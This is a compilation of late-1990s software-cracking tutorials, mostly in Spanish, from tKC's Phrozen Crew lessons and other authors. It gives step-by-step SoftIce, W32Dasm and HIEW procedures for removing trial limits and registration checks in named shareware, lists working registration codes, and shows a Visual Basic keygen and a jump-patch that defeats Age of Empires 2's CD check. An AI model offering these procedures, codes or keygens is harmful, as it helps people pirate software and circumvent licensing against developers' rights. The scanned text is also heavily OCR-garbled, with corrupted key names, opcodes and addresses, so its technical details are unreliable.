- Paso 4.- Ejecuta WC, y ve al directorio de NeverForget. 


- Paso 5.- Copia NeverForget.exe a NeverForget.exx, y copia NeverForget.exe a 
NeverForget.W32. 


- Paso 6.- Ejecuta W32Dasm, y desensambla NeverForget.W32. 


- Paso 7.- Una vez desensamblado, haz click en STRING DATA REFERENCE, y pon “Demo 
version” (Recuerda este mensaje) y haz doble click en el. 


- Paso 8.- Cierra la ventana SDR, con lo que deberías ver la siguiente línea: 
* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


1:00408D55(C) <--- what's it? 


* Possible StringData Ref from Data Obj ->"Demo version " 


- Paso 9.- Ok, vamos a ver que salto realiza este proceso. Mira arriba, a la referencia por la 
llamada en 408D55! Haz click en Goto Code Location, y pon 408D35. 


- Paso 10.- Ahora encontramos el salto aquí: 


:00408D55 0F84F30B0000 je 0040994E 
:00408D5B 53 push ebx 
:00408D5C 53 push ebx 


- Paso 11.- Ok, si miramos abajo, encontraremos también la comprobación de tiempo. (“Will 
expire soon”) Así que, si esquibamos este salto... pero a donde podemos saltar? Vamos a hechar 
un buen vistazo a: 


:00408E2B 53 push ebx 


- Paso 12.- Este debe ser el final de la comprobación de tiempo. Vamos a ver que pasa si 
saltamos a esta dirección. Asegurate de que la barra cyan esta en 00408E2B 53 push ebx y verás 
la dirección de compensación bajo la pantalla, (E Offset 0O00822Bh). Recuerda este Offset. Y 
volvemos a la dirección 408D55, este offset debería ser 8155h, no? 


- Paso 13.- Ok, vuelve a WC, ejecuta HIEW NEVERF-1.EXE, pulsa F4 para seleccionar modo 
descodificador (ASM), pulsa FS, y pon 8155, deberías ver algo como: 


00008155: 0F34F30B0000 je  000008D4E  ---------- (1) 
0000815B: 53 push ebx 
- Paso 14.- Ahora pulsa F3, luego TAB, pon “¡mp 822B” y pulsa ESC. Veras: 
00008155: E9D1000000 jmp 00000822B 
- Paso 15.- Ahora puedes pulsar F9 para guardar los cambios y salir de HIEW. 


- Paso 16.- Ejecuta NeverForget.EXE. boom. No NAGs, no ha caducado! Kewl, lo has hecho!! 


Parte 3: Como registrarse en Phone Plus 2.00 
- Paso 1.- Ejecuta Phone.EXE 


- Paso 2.- Ahora ves ese NAG, parece mierda, no? Ok, no problem, haz click en “Enter 
Registration Code..” 


- Paso 3.- Pulsa CTRL-D para activar Softlce. 
- Paso 4.- Escribe BPPX GETWINDOWSTEXTA y pulsa FS para volver a PhonePlus. 
- Paso 5.- Pon “tKC/Pc “98” como tu nombre y “12345” como tu código, y haz click en OK. 


- Paso 6.- Ahora estas de vuelta en Softlce, escribe D EAX, y ahora ves “12345” en Data 
Window. 


- Paso 7.- Hmm, no... pulsa FS, escribe D EAX, ah, encuentras “tKC/PC “98” en Data Window. 
Boom 


- Paso 8.- Pulsa F11 para llamar al caller. Ves EAX=00000000A en Register Window. Es el 
largo para nuestro nombre (Probamos? A y consigues 10) 


- Paso 9.- Ahora estamos en el lugar correcto. Rastrea al descendiente (Pulsa F10) hasta ver: 
015F:7C69D80F POP EDI 


- Paso 10.- Escribe D ECX, también veras nuestro nombre en Data Window. Rastrea otra vez 
(F10) hasta conseguir: 


015F:0040EC61 CALL 0040ECBA 


- Paso 11.- Desde que sabemos que esta es la última llamada antes de que el mensaje de error 
explote. Necesitamos ir dentro de esta llamada. Pulsa FS para rastrear la llamada. 


- Paso 12.- Rastrea hasta ver: 

015F:7C681D37 MOV ESI,ECX 
- Paso 13.- Ahora escribe D EAX, y que vemos en Data Window? Nuestro código 
- Paso 14.- Pon BD* y pulsa FS para volver a PhonePlus. 


- Paso 15.- Pon “*1P3201795” boom registrado!! 


Parte 4: Como registrarse en WinPatch 
- Paso 1.- Ejecuta WinPatch.EXE. 


- Paso 2.- Ahora ves ese NAG, parece mierda, no? Ok, no problem, haz click en “Enter 
Registration Code..” 


- Paso 3.- Pulsa CTRL-D para activar Softlce. 
- Paso 4.- Escribe BPX GETWINDOWSTEXTA y pulsa FS para volver a WinPatch. 


- Paso 5.- Pon “The Keyboard Caper” como tu nombre y “12345” como ID, y “Phrozen Crew 
“98” como empresa. Luego haz click en OK. 


- Paso 6.- Ahora estas de vuelta en Softlce, escribe D EAX, y ahora ves nuestro nombre en 


Data Window. 


- Paso 7.- Hmm, no... pulsa FS, escribe D EAX, ah, encuentras “12345” en Data Window, no 
esta listo todavía. 


- Paso 8.- Pulsa FS otra vez, pon D EAX boom nuestra empresa en Data Window. We are 
ready to rave. 


- Paso 9.- Pulsa F11 para llamar al caller. Ves EAX=00000010 en Register Window. Es el 
largo para nuestra empresa (Probamos? 10 y consigues 16) 


- Paso 10.- Ahora estamos en el lugar correcto. Rastrea al descendiente (Pulsa F10) hasta ver: 
015F:0040F2A1 PUSH EDX 
015F:0040F2A2 PUSH EAX 
015F:0040F2A3 CALL 00416B50 


- Paso 11.- Desde que sabemos que esta es la última llamada antes de el mensaje de error 
explote. Let's try, pon D EAX, y que ves en Data Window? Nuestro código 


- Paso 12.- Pon BD* y pulsa FS para volver a WinPatch. 


- Paso 13.- Pon “DéáL-1121-1941-3638” boom registrado!! 


Parte 5: Sumario 


Una vez cargado Softlce, no puedes desactivarlo haste que reinicies tu PC. Para verificar que 
Softlce esta cargado, pulsa la Hot-key de Softlce (Crtl-D). La pantalla de Softlce debería 
aparecer. Para volver a Windows usa X (exit) o G (goto), o ES. 


Para la ayuda usa H o Fl. 


Para rastrear a traves de un código fuente, usa T o ES. 


Para rastrear sin ir paso a paso en las llamdas, saltos ect, usa P o F10. 


Para fijar puntos de detención, usa BPX <función> ej: BPX GETWINDOWTEXTA o BPX 
GETDLGITEMTEXTA. 


Para ver puntos de detención, usa BL. 


Para despejar todos los puntos de detención, usa BC*, o el primer punto de detención. Luego 
BCO ect. 


Para activar el punto de detención, usa BEO o BE* para todos los puntos de detención. 
Para desactivar puntos de detención, usa BDO o BD* para todos los puntos de detención. 
Para ir dentro de una función, usa Fl 1. 


En el próximo tutorial te daré más detalles de SoftIce. 


Últimas palabras: 

Espero de verdad que te hayas divertido con este tutorial más de lo que yo lo hize! 

Si me preguntas amablemente, luego abrá una oportunidad de que consigas el tutorial +8 
Agradecimientos a Celeste, Nicolene, Taha é a todo el mundo en el canal PC98! 


Puedes encontrame en 4+PC98 o mandandome un email a tkc Oreaper.org 


Que te diviertas, 
The Keyboard Caper, 


El Fundador de PhRoZeN CreW “94-98 


7-3-1998 


tKKC CRACKING TUTOR, LECCIÓN 8 


Bienvenido al tutorial de crackers +8! 

Yikes! Aquí estamos otra vez! Más abejas... cough.. cough Ok, no es un gran problema. 
Estoy contento de que a la gente le guste esta versión! Así que estaré en este estilo de libros! 
Peligro!!, este tutorial es realmente una madre!! Sonrisa 

Discúlpame por mis errores grámaticales, espero que entiendas este pedazo! 


Ok, let's rave!! 
Contenidos: 


1) Como desbloquear CaptureEze97 6.0, usando Softlce. 


URL: http://www .screencapture.com/c97setup.exe 


2) Como registrarse en MPEG Player 1.76, usando Softlce. 


URL: ftp://ftp.simtel.net/pub/simtelnet/win95/mmedia/mpegp176.zip 


3) Como registrarse en WinXFiles 2.8, usando Softlce £ W32Dasm. 


URL: http://www .pepsoft.com/wxf3228.zip 


4) Como registrarse en CD-R Diagnostic 0.1.1.3, usando SoftIce. 


URL: http://www.enteract.com/-pcrowley/windows/cdrdiagverl13.exe 


5) Trucos para Softlce 


6) Mis últimas palabras 


Herramientas: 


Necesitaras lo siguiente: (Yo usé estas herramientas, y doy por hecho que tú también las usarás): 


W32Dasm 8.9: http://www .fortunecity.com/bally/waterford/18/w32dasm809.zip 


Hacker's View 5.66: ftp://ftp.cdrom.com/.27/sac/utilprog/hiew566.zip 


Far 1.50b: ftp://rwntug.quarta.msk.ru/WinUtil/Rar/Far150b.exe 


Windows Commander 3.50 Beta 7: http://www.ghisler.com 


O pregunta a cualquier cracker por estas herramientas, ellos estaráncontentos por servirte! 


A próposito: Puedes encontrar otras herramientas como Softlce 3.22, IDA 3.70 y otros programas 
en: http://cracking.home.ml.org 


No me digas que no tienes estas herramientas para el próximo tutorial! 


Parte 1: Como desbloquear CaptureEze97 6.0 


Sugerencia: Una vez que el programa es desbloqueado, sigue siendo una versión de prueba, solo 
has eliminado el límite de tiempo. Tendrás que comprar la versión completa. 


- Paso 1.- Ejecuta CAPEZE97.EXE. 


- Paso 2.- Verás la ventana que dice que te quedan 45 días de prueba. Ok, no problem, haz click 
en Purchase. Pon “tKC” como nombre de usuario, “PC 98” como empresa, y “12345” como 
código. 


- Paso 3.- Pulsa CTRL-D para activar Softlce. 
- Paso 4.- Escribe BPPX GETWINDOWTEXTA y pulsa FS para volver a CAPEZE. 
- Paso 5.- Haz click en OK, y ahora estas de vuelta en Softlce, pulsa ES. 


- Paso 6.- Puedes pulsar F11 si quieres, pero esto llevará a un largo rastreo, así que lo mejor es 
pulsar FS otra vez y luego Fl 1, para obtener al llamador. 


- Paso 7.- Ves EAX=00000006 en Register Window? Es el largo para nuestra compañía. 
Sabemos que estamos cerca del nido de la arrabalera. Estamos consiguiendolo allí. 


- Paso 8.- Ratrea los descendientes (F10) hasta ver: 
015F:00633FC1 LEA EAX,[EBP-14] 2P11<---our false code”p 
015F:00633FC4 LEA ECX,[EBP-28] P11<---our code!!%p 
015F:00633FC7 PUSH EAX 


015F:00633FC8 PUSH ECX 


- Paso 9.- Ahora escribe D EAX, Ves “12345” en Data Window? Ok, kewl 
- Paso 10.- Escribe D ECX. Que ves en la Data Window? nuestro código. 
- Paso 11.- Pon BD* y pulsa FS para volver a CAPEZE. 

- Paso 12.-Pon “4422028906994041” unlocked!! 


- Paso 13.- Si no quieres desbloquearlo, puedes encontrar un código restaurar el programa a 
periodo de demostración pulsando Fl0 hasta ver: 


015F:00634034 LEA EAX,[EBP-14] 
015F:00634037 LEA ECX,[EBP-28] 
015F:0063403A PUSH EAX 
015F:0063403B PUSH ECX 
- Paso 14.- Pon D ECX y encontrarás un código para volver al período de demostración. 


(Nuestro código puede ser diferente, desde que te pregunta por el nombre cuando lo instalas la 1* 
vez!) 


Parte 2: Como registrarse en MPEG Player 1.76 

- Paso 1.- Ejecuta MPEGP32.EXE 

- Paso 2.- Verás ese NAG, muy irritante, no? Ok, no problem, haz click en About/Registration. 
- Paso 3.- Pon “tKC/PC “98” como nombre de usuario y “12345” como código. 

- Paso 4.- Pulsa CRTL-D para activar Softlce. 


- Paso 5.- Escribe GETDLGITEMTEXTA y pulsa FS para volver a MPEGP32. 


- Paso 6.- Haz click en Register, y ahora estas de vuelta en Softlce, pulsa ES. 


- Paso 7.- Ahora pulsa F11, para llamar al caller. Ves EAX=000000053 en Register Window? Es 
fácil adivinar que es. El largo para nuestro código. 


- Paso 8.- Ok, ahora deberías ver: 
015F:0040A161 PUSH 00449140 
015F:0040A166 PUSH 0043CCCO 


- Paso 9.- Pon D 449140 y deberías ver “12345” en Data Window. Pon también D 43CCCO0 y 
verás nuestro nombre. 


- Paso 10.- Ok, pulsa F10 hasta estar en: 


- Paso 11.- Necesitamos ir dentro de esta llamada. Esta es la última llamada antes de que el 
mensaje de error explote. Ok, ahora pulsa F8 para ir dentro de la llamada. 


- Paso 12.- Rastrea los descendientes (F10), hasta ver: 
015F:0040E75D MOV ESI,[ESP+0C] 
015F:0040E761 MOV EDL[ESP+10] 
015F:0040E765 LEA EDX,[ESP+0C] 


- Paso 13.- Que tenemos? Ves ESI=13EE3B42 y EDI=BEO96ACF en Register Window?. 
Estamos entrando en el nido de la arrabalera. ] Ok, pulsa F10 hasta que estemos en: 


015F:0040E79F LEA EAX,[ESP+0000010C] 
015F:0040E7A6 MOV DL,[EAX] 
- Paso 14.- Pon D EAX, y que ves en Data Window? nuestro código 
- Paso 15.- Pon BD* y pulsa FS para volver a MPEGP32. 


- Paso 16.- Pon “13ee3b42-be096acf” boom registrado!! 


Parte 3: Como registrarse en WinXFiles 2.8 


Consejo: Este programa esta escrito en Delphi, y a veces usa su propio manipulador. Así que 
tendremos que usar W32Dasm y Softlce para entrar en el nido de la arrabalera. ] 


- Paso 1.- Ejecuta WXFILES.EXE. 
- Paso 2.- Haz click en Register, pon “tKC/PC “98” como nombre y “12345” como código. 


- Paso 3.- Pulsa CRTL-D para activar Softlce, pon BPX GETWINDOWTEXTA y también 
BPX GETDLGITEMTEXTA. 


- Paso 4.- Pulsa FS para volver a WXFILES y haz click en OK. 


- Paso 5.- Hmm, no ha pasado nada. A Delphi no le gusta eso de GETxxxxxxxx exp's.. (Dios 
sabe porque adoro Delphi) ] Ok, no es un gran problema, abre W32Dasm y desensambla 
WXFILES.EXE. 


- Paso 6.- Una vez desensamblado, haz click en STRING DATA REFERENCE, y escribe: 
“Inválid Registration Password” y haz doble click en el. 


- Paso 7.- Cierra la ventana SDR, y deberías ver lo siguiente: 
:00482A1A 668B0ODAC2A4800 mov cx, word ptr [00482AAC] 
:00482A21 B202 mov dl, 02 
* Possible StringData Ref from Code Obj ->"Invalid Registration Password." 
- Paso 8.- Ahora pulsa RePág hasta ver: 
:00482990 8D95D4FBFFFF lea edx, dword ptr [ebp+FFFFFBDA4] 


:00482996 8B45FC mov eax, dword ptr [ebp-04] 


:004829C8 754E jne 00482A18 “P11<---jump if wrong code*p 


:004829CA 8B45FC mov eax, dword ptr [ebp-04] 


- Paso 9.- Ok, tenemos la dirección (482990) y queremos usar esto en Softlce. Cierra 
W32Dasm. 


- Paso 10.- Vuelve a WXFILES, pon tu nombre y código otra vez. No pulses OK todavía. 


- Paso 11.- Pulsa CRTL-D para activar Softlce, pon BPX SHOWWINDOW y pulsa FS. Y 
ahora puedes hacer click en Ok. 


- Paso 12.- Boom Ahora estas en Softlce. Ok, escribe G 482990 (no necesitas pulsar FS!) 
Estarás de vuelta en WXFILES. Pon el código, y haz click en OK otra vez. 


- Paso 13.- Bomm Ves la merecida rotura en (GET=x.xx seconds) Kewl, entramos en el nido 
de la arrabalera. 


- Paso 14.- Ahora pon BD* y pulsa F10 abajo hasta ver: 

015F:004829AB LEA EAX,[EBP+FFFFFBD8] 

- Paso 15.- Pon D EAX y ves “12345” en Data Window. Kewl, getting on... 
- Paso 16.- Pulsa F10 abajo hasta estar en: 

015F:004829C2 POP EAX 

- Paso 17.- Ahora pon D EDX y que ves en Data Window? Arrabalera!! 

- Paso 18.- Pulsa F3 y vuelve a WXFILES. 


- Paso 19.- Pon MCGBVPFMWBAMYXQ BOOM Registrado!! 


Parte 4: Como registrarse en CD-R Diagnostic 0.1.1.3 

- Paso 1.- Ejecuta CRDIAG.EXE 

- Paso 2.- Verás ese NAG, mierda, no? Ok, no problem, haz click en Help/Registration. 
- Paso 3.- Pon “tKC/PC “98” como nombre y “12345” como código. 

- Paso 4.- Pulsa CRTL-D para activar Softlce. 

- Paso 5.- Pon GETDLGITEMTEXTA y pulsa FS para volver a CRDIAG. 

- Paso 6.- Haz click en OK y ahora estas de vuelta en Softlce. 


- Paso 7.- Ahora pulsa F11 para conseguir el llamador. Ver EAX=00000005 en Register 
Window? Es fácil adivinar que es. El largo de nuestro código. 


- Paso 8.- Ok, ahora deberías ver: 

015F:00408AC0 MOV DL,[0041B640] 

- Paso 9.- Pon D 41B640 y deberías ver “12345” en Data Window. 
- Paso 10.- Ok, ahora pulsa F10 abajo hasta estar en: 
015F:00408B26 ADD ESP,04 

- Paso 11.- Deberías ver EAX=0000204C en Register Window. 

- Paso 12.- Ahora escribe ? EAX y tenemos: 

0000204C 0000008268 " L” 


- Paso 13.- Que ves? 8268 es una parte de nuestro código de 4 dígitos. El autor no tan listo 


como pensamos. Si miras detenidamente al código, necesita 8 dígitos para la combinacion 
correcta. El coje el primer y segundo dígito fuera de “$268” para añadirlo al código, y tenemos 
un código de 6 dígitos. Lo hace de nuevo, coje el primer y el segundo dígito fuera de “S28268” y 
lo añade al código, y tenemos el código de 8 dígitos. Ejemplo: 


1) 
Digits: 1234 


Code: 8268 


2) 
Digits: 123456 


Code: 828268 


3) 
Digits: 12345678 


Code: 82828268 


- Paso 14.- Ahora nuestro código debería ser 822828268. Let's try, pon BD* y pulsa FS para 
volver a CRDIAG. 


- Paso 15.- Pon “82828268” boom Registered!! 


Parte 5: Trucos para Softlce 


Aquí están los breake points más frecuentes para el Soft Ice: 


Reading/Writing files: 


ReadHFile 


WriteHile 


CreateFileA 


Leyendo datos en los archivos INI: 


GetPrivateProfileStringA 


GetPrivateProfilelntA 


WritePrivateProfileStringA 


WritePrivateProfilelntA 


Acceso al registro: 


RegCreateKeyA 


RegDeleteKeyA 


RegQueryValueA 


RegCloseKeyA 


RegOpenKeyA 


Dialog Boxes: 


GetWindowTextA 


GetDlgltemTextA 


GetDlgltemInt 


Message Boxes: 


MessageBox 


MessageBoxA 


MessageBoxExA 


MessageBeep 


Tiempo y fecha: 


GetLocalTime 


GetSystemTime 


GetFileTime 


Creating a window (like a NAG): 
Create WindowExA 


ShowWindow 


Thanks go to THE_q for this tips... 


5) Últimas palabras: 
Espero de verdad que te hayas divertido con este tutorial más de lo que yo lo hize! 


En el próximo tutorial, te daré lecciones más avanzadas. Si me preguntas amablemente, obtendrás 
el tutorial +9. 


Tengo unas palabras llenas de sabiduría de alguien, dicen esto: 
If you give a person a crack, 

he will be hungry again. 

If you teach a person to crack, 

he will never be hungry again! 

Traducción por dek_Oin: 


Si le das un crack a alguien, 


estará ambriento otra vez. 


Si enseñas a crackear a ese alguien, 


nunca estará hambriento otra vez! 


Agradecimientos a: Taha, Taylor, Kim, Tracy, Nitallica, Kristina 8 a todo el mundo en el canal 
PC98! Yea babes again! Suspiro J 


Puedes encontrarme en el canal 4PC98 o mandandome un email a tkc Oreaper.org 


Que te diviertas! 


The Keyboard Caper, 


The Founder of PhRoZeN CreW “94-“098 


7-4-1998 


Nota de dek_Oin: lo único que hice con este manual fue traducir algunas partes, pasarlo a 
formato HTML y corregirlo(si que me costó!!!). No me hago responsable del uso que se le 
pueda dar. Si no entiendes algo, no me mandes ningún mail. Manda uno al autor del 
manual, o sea, tKC. 


ASTALAVISTA 


Ingeniería Inversa de Software - CrackersConvert v1.0 
Escribiendo un Generador de Claves 
Autor: Volatility 


Por favor Lee el "Disclaimer" antes de continuar. 


Objetivo CrackersConvert v1.0 - (cconvert.zip) - 20,312 bytes 
Localización http://pages.prodigy.net/volatility/database/cconvert.zip 
Proteccion(es) Nombre Usuario/ Numero de serie 
Herramientas necesarias NuMega Smartcheck v5.0 (O Superior) 

Microsoft Visual Basic 5.0 ( Pienso que cualquier versión funcionará) 
Nivel () Principiante (X) Intermedio () Avanzado ( ) Experto 


Preparado para Crackear: 


Desde que yo escribí esta utilidad y crackme (qué espero que encuentres útil!) , decidí que lo explicaría mejor exactamente cómo uno lo haría para explicar los cálculos (sin 
cualquier conocimiento improcedente *g *) para escribir un generador de claves. 


Si estás leyendo este archivo, una de dos, o te has rendido en deducir el cálculo, no tiene ninguna idea cómo hacerlo, y no quieres, o solamente quieres confirmar tus sospechas... 
¡Yo espero que el último caso sea el verdadero! 


Después de que leas esto... verás exactamente qué simple es este cálculo, y te pegarás probablemente en la cabeza unas cuantas veces, o querrás pegarme a mi en la cabeza 
unas cuantas veces :) 


Si tienes una versión más vieja de mi programa, por favor bájate el nuevo Aquí, ya que el viejo tenía un error en un cronómetro que se hizo por una confusión, usando Smartcheck. 
Bájate la nueva versión en cualquier caso, sólo para estar seguro. 


Puesto que los app están escrito en VB, y desde que VB es el único idioma que yo conozco realmente bien (patético, lo se !), nosotros escribiremos el generador de claves también 
en VB. 


Haciendo el Crack: 


Este ensayo ASUME que ya has crackeado, y encontrado tu número de serie correcto utilizando Soft-lce, o algún otro método. Conocer el número de serie correcto para tu nombre 
es ESENCIAL, y debes pescarlo antes de que puedas proseguir con este ensayo. Tutoriales sobre hacer esto serán suministrados por mí, o mi website, una vez las personas 
empiecen a escribir y contribuir con ellos. Si nadie lo hace, yo escribiré uno yo mismo. El programa debe estar en su estado "no registrado". Si ya tienes el programa registrado, 
puedes " des-registrarlo" borrando un carácter en "cconvert.ccc." 


Para este ensayo, nosotros usaremos mi nombre de usuario y número de serie. Verás qué fácil es aplicar el tuyo propio después de esta lección :) 
Ok... así que hemos pescado nuestro número de serie correcto... debemos tener ahora la siguiente información: 


User Name: Volatility 
Serial Number: REG-1720-CODE 


Ahora que nosotros tenemos esta información... arranquemos Smartcheck para ver lo que podemos encontrar fuera. Carga el programa en Smartcheck ("File", "Open" entonces 
escoge cconvert.exe). Aprieta el botón "Run" (el botón con una pequeña flecha verde en él). JUSTO DESPUÉS DE apretar el botón de run, escoge "View" entonces "Show All 
Events." Ahora sólo permite a Smartcheck hacer su trabajo, hasta que veas aparecer la caja de mensaje de "Unregistered versión". Aprieta "OK", permite a Smartcheck trabajar un 
poco más hasta que el programa esté arriba. Ahora pulsa el botón sobre el botón "About", entonces el botón "Register". Introduce tu nombre de usuario (Volatilidad) y un número de 
serie (272727). Aprieta el botón "Validate", pulsa el botón ok cuando aparece la caja del mensaje "Sorry, Better Luck Next Time", y ahora tenemos toda la información que nosotros 
necesitaremos. 


Elige "View", "Expand All" del menú. Ahora nosotros necesitamos encontrar el lugar donde apretaste el botón "Validate". La orden es "cmdValidate_Click." Una vez encuentres esto, 
verás lo siguiente debajo de el (se muestran sólo las partes pertinentes que necesitaremos aquí): 


txtUserName.Text 


Len (String: "Volatili...")returns LONG:10 
txtUserName.Text 
Mid(VARIANT:String"Volatili...", long:1, VARIANT: Integer:5) 


Asc (String: "Volat") returns Integer:86 
Str (VARIANT: Integer:86 


Ahora (en caso de que no conozcas Visual Basic, o algo de programación) aquí está lo que cada línea hace: 


txtUserName.Text 
Consigue el nombre de usuario que entraste en el cuadro de texto. 


Len(String:"Volatili...")returns LONG:10 
Consigue la longitud (LEN) del nombre de usuario que introdujiste. Volatility tiene 10 caracteres (retorna LONG:10). 


txtUserName.Text 
Lee tu nombre de usuario de nuevo. 


Mid(VARIANT:String"Volatili...", long:1, VARIANT:Integer:5) 
Usa la función Mid para seleccionar un cierto número de caracteres del nombre de usuario que entraste--nosotros sólo sabemos que estamos seleccionando cinco caracteres 
(VARIANT:Integer:5) por ahora. 


Asc(String:"Volat") returns Integer:86 

Ahora sabemos que la función anterior seleccionó los PRIMEROS CINCO caracteres de nuestro nombre de usuario, así que nos deja con "Volat". Ahora, selecciona el PRIMER 
carácter de este string, y lo convierte a ASCII. (NOTA: La función Asc en VB toma el primer carácter de un string, y lo convierte a ASCII). El primer carácter de nuestro string es V, y 
el equivalente en ASCII es 86 (retorna Integer:86). 


Str(VARIANT:Integer:86) 
El primer carácter de nuestro nombre es convertido al número 86 ahora. 


Para resumir este proceso entero, la rutina consigue nuestro nombre de usuario (Volatility), selecciona algunos caracteres (no se sirve de ningún propósito, otra cosa que confundirá 
a los crackers :)) desde él, en este caso los primeros cinco (Volat), usa la función Asc para convertir el primer carácter (V) a su ASCII equivalente (86). 


Ok... esto es todo bueno y dandi, pero bueno ¿qué diablos nos hace el número 86? No tiene nada en común con nuestro número de serie.... ¿o lo hace? Usando un poco de 
intuición, y un poco de *Zen Cracking *, nosotros decidimos dividir nuestro número de serie, 1720 entre 86. Lo que nos queda es el número 20 exactamente :) ¡Eso es! ¡Nuestro 
string reconstruido (86) simplemente es multiplicado por 20 para generar nuestro número de serie! 


Ahora, a codificar el generador de claves. Debes crear una figura primero con dos cajas de texto (Text1 y Text2), y un botón de comando. Doble click al botón de comando, y entra el 
código siguiente: (se comentan las líneas, así sabes lo que hacen): 


Dim RegString, RegConv, RegCode, RegMult 'Prepara algunas variables 


If Len(Text1.Text) > 4 Then 'Comprueba si el nombre de usuario entrado tiene por lo menos 5 caracteres 
RegString = Textl.Text 

'la Variable RegString es ahora el nombre del usuario entrado 

RegConv = Mid(RegString, 1, 5) 'consigue los 5 primeros caracteres del nombre de usuario = RegConv 


RegConv = Str(Asc(RegConv)) 'Convierte el primer carácter a ASCII = RegConv 
Else 

'Si el nombre del usuario no es 5 caracteres largo, entonces 

MsgBox ("User Name Must Be At Least Five Characters Long") 

'Despliega Mensaje de Error 

GoTo Quit 'Termina 

End If 'Termina la función 


RegMult = RegConv * 20 
'Multiplica el nuevo valor de ASCII por 20 


RegCode = "REG-" £ RegMult € "-CODE" 'agrega "REG-" y "-CODE" alrededor del número 
Text2.Text = RegCode 'Expone el número de serie en Text2 


Quit: 


Espero que, este ensayo te encamine en la dirección correcta, para encontrar cómo algunos registros son calculados, así como, cómo usar este conocimiento para escribir un 
generador de claves. ¡Dudo mucho que encuentres otro cálculo tan simple como el mío! 


*** Disclaimer * * * 
Este Ensayo Sólo Es con Propósitos de Conocimiento. Ni nosotros, ni nuestros ISP, ni ninguna Persona se hará Responsable de Cualquier Daño o perjuicio que pueda ser causado 
por el Uso Inapropiado de tu Máquina. 


Si Craqueas un Programa Con éxito, debes Borrarlo Inmediatamente. ¡Si Quieres Guardar El Programa, Por favor CÓMPRALO! ¡Apoya al Shareware, este es Nuestra Herramienta 
de Aprendizaje! 


Es llegal para Continuar Usando Software Crackeado/Parcheado. 


FF +++ | 
Copyright O 1998 Volatility And The Immortal Descendants. All Rights Reserved. 


Cracking Age of Empires 2 The Conqueros 


Empieza la magia! 
Hola que tal ahora les presento mi tuto sobre CD-Checks!!! 
Una cosa que queria decir a los chicos de Ensemble estudio (creadores de AOE) es que 
como pueden haber creado un juego tan bueno y con una proteccion igual de crackear 
en cualquier version de AOE y ademas tan pero tan estupida. 


Manos a la obra! !!. 

Como ya saben primero abrimos el programa a crackear (AOE 2) sin el CD puesto para 
ver que nos dice. Pasan los videos, presentaciones, etc y??? Arranco igual, que 
pasara? Nahh traten de jugar y van a ver como les aparece la nag de Insert de CD. 
Buieno una ves identificado nuestro objetivo, nos vamos al W32Dasm y 
desensamblamos. Una ves desensamblado vuscamos la cadena Insert the cd y.... Ups 
que paso? No ta? SI pensamos un poquito seguro lo que nos mostro era una imagen 
no una string. Ahhh claro pero y ahora como hago?. 

Bueno ahora biene la explicacion de cómo crackear la mayoria de los programas con 
CD check. 

Bueno los programas, para ver si tienen puesto el CD hacen una llamada al la librería 
KERNEL32 a la api GETDRIVETYPEA asi que si en el W32Dasm apretamos el boton de 
imp fn y buscamos la cadena Kernel32.GetdrivetypeA 


KERNEL32 GetDateFormatá, 
KERNEL32 GetDrivel unes, 
KERNEL32 GetEnvironmentStrings 

KERNEL32 GetEnvironmentsStrinas' 


y hacemos doble click vamos a parar a: 


* Reference To: KERNEL32.GCetDriveTypeA, Ord: 0000h 
l 


:0041F18A 83F305 cmp eax, 00000005 
:0041F18D 740D je 0041F19C 
:0041F18F 5E pop esi 

:0041F190 33C0 xor eax, eax 
:0041F192 5B pop ebx 

:0041F193 81040C020000 add esp, 0000020C 
:0041F199 C20400 ret 0004 


y si hacemos otro doble click vamos a parar a: 


* Reference To: KERNEL32.GCetDriveTypeiA, Ord: 0000h 
l 


D05FF336 85C0 test eax, eax 
:DO5FF338 7404 je 005FF344 
:DOS5FF33A S83F301 cmp eax, 00000001 


DO5FF33D 7405 je 005FF344 


Yo en este caso probe prmero con el primer 2 click y funciono pero siempre tenes que 
hacer mas de un 2 click para ver si hay mas llamadas a esa funcion y ver cual es la 
que anda!!! OK? 


Es importante decir que aca (en el primer 2 click) no se hace la comparacion sino que 
esto es lo que hace que te muestre la nag screen. Para ver donde se hace el checkeo 
del cd tenemos que subir un poco hasta donde dice: 

* Referenced by a (Uinconditional or (Cjonditional Jump at Address: 


y apretar el boton de ir a un lugar del codigo e introducir la direccion 0041F176 (esta 
es la direccion de la referencia de la imagen de arriba) y aterrizamos aca: 


:0041F166 683CD86400 push 0064D83C 
:0041F16B 6400 push 00000000 
:0041F16D ESS9EEEO900 call 004BE010 
:0041F172 SBFO mov esi, eax 


:0041F174 85F6 test esi, esi 


Uhmmm un jne (salta si no es igual)(75 en haxadecimal) debajo de un test? Que 
sospechoso no? 

Uhmmm y que pasaria si vamos al Hex Editor y lo cambiamos a je (salta si es igual) 
(74 en hexadecimal)? 


Lo que esta haciendo es, esta comparando dos registro, uno que esta por default 
adentro del programa y el otro es uno que se genera dependiendo de si esta el CD o 
no. Un poco mas practico seria que si esta el CD y ESI = 1, el otro ESI va a ser 1 para 
que no salte. 


Test ESI = 1, ESI = 1 € como son iguales no salta y sigue. 
Test ESI = 1, ESI = O < como no son iguales salta y muestra el error. 


Recuerden no cambiarlo en cualquier parte sino en el OFFSET indicado por el 
W32Dasm. Y ademas no pongan los ceros ni la “h” po que es pa que entienda el 
W32Dasm. 

al] E 

| Line:60750 Pg 579 of 9521 Code Data (2:0041F176 AOffset D0D01F17Eh in File:empires2.exe 


Congratulations se pasa la proteccion de largo y nosotros contentos. Ojo que si ahora 

lo queremos jugar con cd no se ba a poder por que va a comprobar y va a ver que es 

igual y va a saltar. Para arreglar esto pordemos poner en ves de 740B podemos poner 
9090 que es NOP NOP (NO OPERATION) y no hara nada solo seguira de largo!!! 


Cracking Transcender with SoftiCe...ccocoooooooonooooo... 


Here's something on how to crack Transcenders yourself. Fosi's site has 
SoftIce. Hope this is useful. 


Title: Crack them all- Transcender How to 

Author: Paddua 

Content 

Ok, even though I would loooove to see a new universal crack for the 
transcender, all of these requests are getting ridiculous. 

You CAN crack your own, the keygen would be nice, but not necessary. I grabbed 
a tutorial posted by Helper, btw, thank you Helper, very good article, and 
then I got all the transcenders off the ftp site. Once I had all of the demos 
installed , it took only about a half hour to crack them ALL. All you have to 


do is follow directions . So here are Helper's directions again , and they 
worked great (Win98, fat32). They work on the new previews too (site and 
commerce) 


Step 1: Download and install Softice (and its crack) If you don't know where 


to download it I can't help you. (in otherwards, it's waaaaaaaaaaaay to easy 
to find) 
When you install Softice, it must load before windows does. (It will ask you 


when installing if you want Softice to load when you turn on your computer, 
say yes) 


